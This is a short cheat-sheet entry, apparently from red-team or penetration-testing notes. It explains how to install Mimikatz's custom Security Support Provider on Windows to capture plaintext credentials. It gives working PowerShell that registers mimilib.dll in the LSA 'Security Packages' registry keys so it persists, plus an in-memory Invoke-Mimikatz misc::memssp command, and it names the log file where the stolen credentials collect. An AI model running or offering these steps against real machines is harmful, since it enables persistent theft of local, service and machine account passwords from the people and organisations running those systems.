8.6 - Custom SSP

Custom SSP

• A Security Support Provider (SSP) is a DLL that allows applications to establish authenticated connections. Common Microsoft SSPs include:

  • NTLM

  • Kerberos

  • Wdigest

  • CredSSP

• Mimikatz provides a custom SSP (mimilib.dll) that logs plaintext credentials (including local, service, and machine accounts) on the targeted machine.

Installation Methods:

1. Registry Injection Method (Persistent):

Drop the mimilib.dll into C:\Windows\System32\ and register it via the Registry:

# Append 'mimilib' to the list of registered security packages
$packages = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\' -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$packages += "mimilib"

# Update registry entries
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\' -Name 'Security Packages' -Value $packages
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\' -Name 'Security Packages' -Value $packages

2. In-Memory Injection (Less Stable, especially on Server 2019/2022):

Invoke-Mimikatz -Command '"misc::memssp"'

All captured credentials will be logged in:

C:\Windows\System32\mimilsa.log